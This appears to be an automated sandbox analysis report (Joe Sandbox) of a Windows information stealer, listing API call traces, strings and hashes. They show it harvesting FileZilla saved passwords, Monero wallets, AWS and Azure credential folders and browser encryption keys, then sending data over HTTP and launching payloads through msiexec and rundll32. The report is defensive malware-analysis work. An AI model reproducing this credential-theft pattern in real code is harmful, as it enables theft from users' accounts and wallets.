                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9126631bc8aa0710d869af34504d8296e4ad7cf3988633abe46731ecde8c19a3
                          • Instruction ID: 9a78d61a84f26528dcb94958f7a42e92c3851b1123c7b9e2c35bf1e2176479a4
                          • Opcode Fuzzy Hash: 9126631bc8aa0710d869af34504d8296e4ad7cf3988633abe46731ecde8c19a3
                          • Instruction Fuzzy Hash: 134117B3A082045FF304AE28DD9573BB7D6EB94320F1A853DDAC5D3784E93A68158296
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cb146d2175f3404f0d42e430a9b497bf52bb28c7a6d35048c45d18ff122c7b07
                          • Instruction ID: 173c11cfa0ba699b9ac9cdbc6bd682aea335d5a028471209c8daefa798399b94
                          • Opcode Fuzzy Hash: cb146d2175f3404f0d42e430a9b497bf52bb28c7a6d35048c45d18ff122c7b07
                          • Instruction Fuzzy Hash: 6331E2F3E181008BF304AA39DC967B776E7ABD0715F1B853DDA8987384ED7808468696
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00DF8E0B
                            • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                            • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                            • Part of subcall function 00DE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DE99EC
                            • Part of subcall function 00DE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00DE9A11
                            • Part of subcall function 00DE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00DE9A31
                            • Part of subcall function 00DE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00DE148F,00000000), ref: 00DE9A5A
                            • Part of subcall function 00DE99C0: LocalFree.KERNEL32(00DE148F), ref: 00DE9A90
                            • Part of subcall function 00DE99C0: CloseHandle.KERNEL32(000000FF), ref: 00DE9A9A
                            • Part of subcall function 00DF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00DF8E52
                          • GetProcessHeap.KERNEL32(00000000,000F423F,00E00DBA,00E00DB7,00E00DB6,00E00DB3), ref: 00DF0362
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DF0369
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00DF0385
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF0393
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 00DF03CF
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF03DD
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00DF0419
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF0427
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00DF0463
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF0475
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF0502
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF051A
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF0532
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF054A
                          • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00DF0562
                          • lstrcat.KERNEL32(?,profile: null), ref: 00DF0571
                          • lstrcat.KERNEL32(?,url: ), ref: 00DF0580
                          • lstrcat.KERNEL32(?,00000000), ref: 00DF0593
                          • lstrcat.KERNEL32(?,00E01678), ref: 00DF05A2
                          • lstrcat.KERNEL32(?,00000000), ref: 00DF05B5
                          • lstrcat.KERNEL32(?,00E0167C), ref: 00DF05C4
                          • lstrcat.KERNEL32(?,login: ), ref: 00DF05D3
                          • lstrcat.KERNEL32(?,00000000), ref: 00DF05E6
                          • lstrcat.KERNEL32(?,00E01688), ref: 00DF05F5
                          • lstrcat.KERNEL32(?,password: ), ref: 00DF0604
                          • lstrcat.KERNEL32(?,00000000), ref: 00DF0617
                          • lstrcat.KERNEL32(?,00E01698), ref: 00DF0626
                          • lstrcat.KERNEL32(?,00E0169C), ref: 00DF0635
                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF068E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 1942843190-555421843
                          • Opcode ID: c3048a427bd3c1d2822412301d6a6d6f99e510523dc8a429b3820ca948fde0e7
                          • Instruction ID: b7bb603ef3a399463ac33120869e00bbdd1f0f4974fba9978a7e70eedd402dec
                          • Opcode Fuzzy Hash: c3048a427bd3c1d2822412301d6a6d6f99e510523dc8a429b3820ca948fde0e7
                          • Instruction Fuzzy Hash: B8D10BB5900208ABCB14EBE4DD96EFEB778EF14300F558418F606A7085DE75AA4ACB71
                          APIs
                            • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                            • Part of subcall function 00DE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00DE4839
                            • Part of subcall function 00DE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00DE4849
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00DE59F8
                          • StrCmpCA.SHLWAPI(?,00840B30), ref: 00DE5A13
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00DE5B93
                          • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00840BE0,00000000,?,0083FAE0,00000000,?,00E01A1C), ref: 00DE5E71
                          • lstrlen.KERNEL32(00000000), ref: 00DE5E82
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00DE5E93
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DE5E9A
                          • lstrlen.KERNEL32(00000000), ref: 00DE5EAF
                          • lstrlen.KERNEL32(00000000), ref: 00DE5ED8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00DE5EF1
                          • lstrlen.KERNEL32(00000000,?,?), ref: 00DE5F1B
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00DE5F2F
                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00DE5F4C
                          • InternetCloseHandle.WININET(00000000), ref: 00DE5FB0
                          • InternetCloseHandle.WININET(00000000), ref: 00DE5FBD
                          • HttpOpenRequestA.WININET(00000000,00840C10,?,00840030,00000000,00000000,00400100,00000000), ref: 00DE5BF8
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                            • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                            • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                          • InternetCloseHandle.WININET(00000000), ref: 00DE5FC7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 874700897-2180234286
                          • Opcode ID: 9cefeb6ad57131207380e2bdf477570a800d713f401f9c463224ccc711409869
                          • Instruction ID: 3682308ecdcbc4f76b2aa365f8a6cd826c0c79ab012a788683c108b3228f7c83
                          • Opcode Fuzzy Hash: 9cefeb6ad57131207380e2bdf477570a800d713f401f9c463224ccc711409869
                          • Instruction Fuzzy Hash: 2F121CB192012CAACB15EBA4DC95FEEB378FF14740F5181A9F20A66091DF702A49CF75
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                            • Part of subcall function 00DF8B60: GetSystemTime.KERNEL32(00E00E1A,0083FC00,00E005AE,?,?,00DE13F9,?,0000001A,00E00E1A,00000000,?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DF8B86
                            • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                            • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00DECF83
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00DED0C7
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DED0CE
                          • lstrcat.KERNEL32(?,00000000), ref: 00DED208
                          • lstrcat.KERNEL32(?,00E01478), ref: 00DED217
                          • lstrcat.KERNEL32(?,00000000), ref: 00DED22A
                          • lstrcat.KERNEL32(?,00E0147C), ref: 00DED239
                          • lstrcat.KERNEL32(?,00000000), ref: 00DED24C
                          • lstrcat.KERNEL32(?,00E01480), ref: 00DED25B
                          • lstrcat.KERNEL32(?,00000000), ref: 00DED26E
                          • lstrcat.KERNEL32(?,00E01484), ref: 00DED27D
                          • lstrcat.KERNEL32(?,00000000), ref: 00DED290
                          • lstrcat.KERNEL32(?,00E01488), ref: 00DED29F
                          • lstrcat.KERNEL32(?,00000000), ref: 00DED2B2
                          • lstrcat.KERNEL32(?,00E0148C), ref: 00DED2C1
                          • lstrcat.KERNEL32(?,00000000), ref: 00DED2D4
                          • lstrcat.KERNEL32(?,00E01490), ref: 00DED2E3
                            • Part of subcall function 00DFA820: lstrlen.KERNEL32(00DE4F05,?,?,00DE4F05,00E00DDE), ref: 00DFA82B
                            • Part of subcall function 00DFA820: lstrcpy.KERNEL32(00E00DDE,00000000), ref: 00DFA885
                          • lstrlen.KERNEL32(?), ref: 00DED32A
                          • lstrlen.KERNEL32(?), ref: 00DED339
                            • Part of subcall function 00DFAA70: StrCmpCA.SHLWAPI(00838B28,00DEA7A7,?,00DEA7A7,00838B28), ref: 00DFAA8F
                          • DeleteFileA.KERNEL32(00000000), ref: 00DED3B4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                          • String ID:
                          • API String ID: 1956182324-0
                          • Opcode ID: ea9fb6e6690cd3a5d14591edfbc9ef6dbd8c8bdfab131ee2c7ddd94e195d1141
                          • Instruction ID: 5f7ec0825357541f0b8287e9b6aa911a529e14a9a8ef491ee9cf2ab3537a5723
                          • Opcode Fuzzy Hash: ea9fb6e6690cd3a5d14591edfbc9ef6dbd8c8bdfab131ee2c7ddd94e195d1141
                          • Instruction Fuzzy Hash: D1E13FB1910109ABCB24FBA4DD96EFE7378EF14300F118158F60AB7495DE75AA09CB72
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                            • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0083E920,00000000,?,00E0144C,00000000,?,?), ref: 00DECA6C
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00DECA89
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00DECA95
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00DECAA8
                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00DECAD9
                          • StrStrA.SHLWAPI(?,0083EAB8,00E00B52), ref: 00DECAF7
                          • StrStrA.SHLWAPI(00000000,0083E9B0), ref: 00DECB1E
                          • StrStrA.SHLWAPI(?,0083F228,00000000,?,00E01458,00000000,?,00000000,00000000,?,00838B98,00000000,?,00E01454,00000000,?), ref: 00DECCA2
                          • StrStrA.SHLWAPI(00000000,0083F2E8), ref: 00DECCB9
                            • Part of subcall function 00DEC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00DEC871
                            • Part of subcall function 00DEC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00DEC87C
                          • StrStrA.SHLWAPI(?,0083F2E8,00000000,?,00E0145C,00000000,?,00000000,00838B68), ref: 00DECD5A
                          • StrStrA.SHLWAPI(00000000,00838948), ref: 00DECD71
                            • Part of subcall function 00DEC820: lstrcat.KERNEL32(?,00E00B46), ref: 00DEC943
                            • Part of subcall function 00DEC820: lstrcat.KERNEL32(?,00E00B47), ref: 00DEC957
                            • Part of subcall function 00DEC820: lstrcat.KERNEL32(?,00E00B4E), ref: 00DEC978
                          • lstrlen.KERNEL32(00000000), ref: 00DECE44
                          • CloseHandle.KERNEL32(00000000), ref: 00DECE9C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                          • String ID:
                          • API String ID: 3744635739-3916222277
                          • Opcode ID: 81b67ead00f9fb401bd4fabc4d9fe1c5622cce1512b574c8e35388da92795325
                          • Instruction ID: 845b5696a829c604c025fe2660ba783e01042a4413e738a344975b42b0558feb
                          • Opcode Fuzzy Hash: 81b67ead00f9fb401bd4fabc4d9fe1c5622cce1512b574c8e35388da92795325
                          • Instruction Fuzzy Hash: C5E1F9B190010CABDB14EBA8DC91FEEB778EF14340F518169F20A67195EF746A4ACB71
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                          • RegOpenKeyExA.ADVAPI32(00000000,0083BD50,00000000,00020019,00000000,00E005B6), ref: 00DF83A4
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00DF8426
                          • wsprintfA.USER32 ref: 00DF8459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00DF847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 00DF848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00DF8499
                            • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                          Strings
                          Yara matches
                          Similarity
                          • API ID: CloseOpenlstrcpy$Enumwsprintf
                          • String ID: - $%s\%s$?
                          • API String ID: 3246050789-3278919252
                          • Opcode ID: cb124e3b98d666f204abdd15ad796c068720da23b2af16610ab868a8127d6637
                          • Instruction ID: 3f089b1bdefd73cc9cad1ba060acf4c3effa55405a80c650d604da3c3ce8108a
                          • Opcode Fuzzy Hash: cb124e3b98d666f204abdd15ad796c068720da23b2af16610ab868a8127d6637
                          • Instruction Fuzzy Hash: 7481E9B191011CAADB24DF54CC95FEAB7B8FF08700F10C299E24AA6180DF756B85CFA5
                          APIs
                            • Part of subcall function 00DF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00DF8E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00DF4DB0
                          • lstrcat.KERNEL32(?,\.azure\), ref: 00DF4DCD
                            • Part of subcall function 00DF4910: wsprintfA.USER32 ref: 00DF492C
                            • Part of subcall function 00DF4910: FindFirstFileA.KERNEL32(?,?), ref: 00DF4943
                          • lstrcat.KERNEL32(?,00000000), ref: 00DF4E3C
                          • lstrcat.KERNEL32(?,\.aws\), ref: 00DF4E59
                            • Part of subcall function 00DF4910: StrCmpCA.SHLWAPI(?,00E00FDC), ref: 00DF4971
                            • Part of subcall function 00DF4910: StrCmpCA.SHLWAPI(?,00E00FE0), ref: 00DF4987
                            • Part of subcall function 00DF4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00DF4B7D
                            • Part of subcall function 00DF4910: FindClose.KERNEL32(000000FF), ref: 00DF4B92
                          • lstrcat.KERNEL32(?,00000000), ref: 00DF4EC8
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00DF4EE5
                            • Part of subcall function 00DF4910: wsprintfA.USER32 ref: 00DF49B0
                            • Part of subcall function 00DF4910: StrCmpCA.SHLWAPI(?,00E008D2), ref: 00DF49C5
                            • Part of subcall function 00DF4910: wsprintfA.USER32 ref: 00DF49E2
                            • Part of subcall function 00DF4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00DF4A1E
                            • Part of subcall function 00DF4910: lstrcat.KERNEL32(?,00840CA0), ref: 00DF4A4A
                            • Part of subcall function 00DF4910: lstrcat.KERNEL32(?,00E00FF8), ref: 00DF4A5C
                            • Part of subcall function 00DF4910: lstrcat.KERNEL32(?,?), ref: 00DF4A70
                            • Part of subcall function 00DF4910: lstrcat.KERNEL32(?,00E00FFC), ref: 00DF4A82
                            • Part of subcall function 00DF4910: lstrcat.KERNEL32(?,?), ref: 00DF4A96
                            • Part of subcall function 00DF4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00DF4AAC
                            • Part of subcall function 00DF4910: DeleteFileA.KERNEL32(?), ref: 00DF4B31
                          Strings
                          Yara matches
                          Similarity
                          • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 949356159-974132213
                          • Opcode ID: 696ad13c5f4f70a8994d9841282c9e5fda1a753233d74cd0cf586884dcd64f04
                          • Instruction ID: 963ec1e219aa5541debda5a64e40550526c7b1f208a64da96dc6dd0f0ada36f0
                          • Opcode Fuzzy Hash: 696ad13c5f4f70a8994d9841282c9e5fda1a753233d74cd0cf586884dcd64f04
                          • Instruction Fuzzy Hash: 504132BAA4030866DB64FB60DC47FED7238EB64700F408494B689660C5EEF557C98BB2
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00DF906C
                          Strings
                          Yara matches
                          Similarity
                          • API ID: CreateGlobalStream
                          • String ID: image/jpeg
                          • API String ID: 2244384528-3785015651
                          • Opcode ID: b0b3e8d365fa52f9ec40760e34cc584829ac7292f25be43e1c03123d24887c26
                          • Instruction ID: c892d95941ad8e07dc0fd19c187c92a19c8d39e3bb643839c34ab3ca217bf6dd
                          • Opcode Fuzzy Hash: b0b3e8d365fa52f9ec40760e34cc584829ac7292f25be43e1c03123d24887c26
                          • Instruction Fuzzy Hash: 3B71DE75A10208EBDB24EFE4D899FEDB7B8FB48700F108518F655A7284DB79A905CB70
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00DF31C5
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00DF335D
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00DF34EA
                          Strings
                          Yara matches
                          Similarity
                          • API ID: ExecuteShell$lstrcpy
                          • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                          • API String ID: 2507796910-3625054190
                          • Opcode ID: 069a164d0a6710d345fe8d0d65f23e1afbef7a46868d733c3c41ef91f8691741
                          • Instruction ID: 9d19018d75c661d0e814823977b029c6a49a5106de92851e9ceb07bc7b1f90e3
                          • Opcode Fuzzy Hash: 069a164d0a6710d345fe8d0d65f23e1afbef7a46868d733c3c41ef91f8691741
                          • Instruction Fuzzy Hash: BB120AB180011C9ADB14EBA4CC92FFEB738EF14340F558169E60A66195EF746B4ACF72
                          APIs
                            • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                            • Part of subcall function 00DE6280: InternetOpenA.WININET(00E00DFE,00000001,00000000,00000000,00000000), ref: 00DE62E1
                            • Part of subcall function 00DE6280: StrCmpCA.SHLWAPI(?,00840B30), ref: 00DE6303
                            • Part of subcall function 00DE6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00DE6335
                            • Part of subcall function 00DE6280: HttpOpenRequestA.WININET(00000000,GET,?,00840030,00000000,00000000,00400100,00000000), ref: 00DE6385
                            • Part of subcall function 00DE6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00DE63BF
                            • Part of subcall function 00DE6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DE63D1
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00DF5318
                          • lstrlen.KERNEL32(00000000), ref: 00DF532F
                            • Part of subcall function 00DF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00DF8E52
                          • StrStrA.SHLWAPI(00000000,00000000), ref: 00DF5364
                          • lstrlen.KERNEL32(00000000), ref: 00DF5383
                          • lstrlen.KERNEL32(00000000), ref: 00DF53AE
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 3240024479-1526165396
                          • Opcode ID: 363c562cd34135b0e19b8ab77b2209da1f9de48390edf09dc188a10e72cd4510
                          • Instruction ID: 8ffdb5a78dbfee929f43b01cc50f04d2d44f31df214745ddba1deaad8687c0f7
                          • Opcode Fuzzy Hash: 363c562cd34135b0e19b8ab77b2209da1f9de48390edf09dc188a10e72cd4510
                          • Instruction Fuzzy Hash: 8E513AB091014D9BCB14FF68C992AFD3778EF10340F55C018EA0A6A596EF74AB45CBB2
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 09b3965f0a4e6f45b89cd043381c46824f4adff7c520152d80f91798d25e56b6
                          • Instruction ID: 6533ea7e059e7132971ddaa299784e4dc7cbae82052fc54117b87ac49d06d843
                          • Opcode Fuzzy Hash: 09b3965f0a4e6f45b89cd043381c46824f4adff7c520152d80f91798d25e56b6
                          • Instruction Fuzzy Hash: 9EC172B5A0021DDBCB24EF60DC89FEA7378FF54304F118598E60AA7141DA75AA85CFB1
                          APIs
                            • Part of subcall function 00DF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00DF8E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00DF42EC
                          • lstrcat.KERNEL32(?,00840720), ref: 00DF430B
                          • lstrcat.KERNEL32(?,?), ref: 00DF431F
                          • lstrcat.KERNEL32(?,0083EA88), ref: 00DF4333
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DF8D90: GetFileAttributesA.KERNEL32(00000000,?,00DE1B54,?,?,00E0564C,?,?,00E00E1F), ref: 00DF8D9F
                            • Part of subcall function 00DE9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00DE9D39
                            • Part of subcall function 00DE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DE99EC
                            • Part of subcall function 00DE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00DE9A11
                            • Part of subcall function 00DE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00DE9A31
                            • Part of subcall function 00DE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00DE148F,00000000), ref: 00DE9A5A
                            • Part of subcall function 00DE99C0: LocalFree.KERNEL32(00DE148F), ref: 00DE9A90
                            • Part of subcall function 00DE99C0: CloseHandle.KERNEL32(000000FF), ref: 00DE9A9A
                            • Part of subcall function 00DF93C0: GlobalAlloc.KERNEL32(00000000,00DF43DD,00DF43DD), ref: 00DF93D3
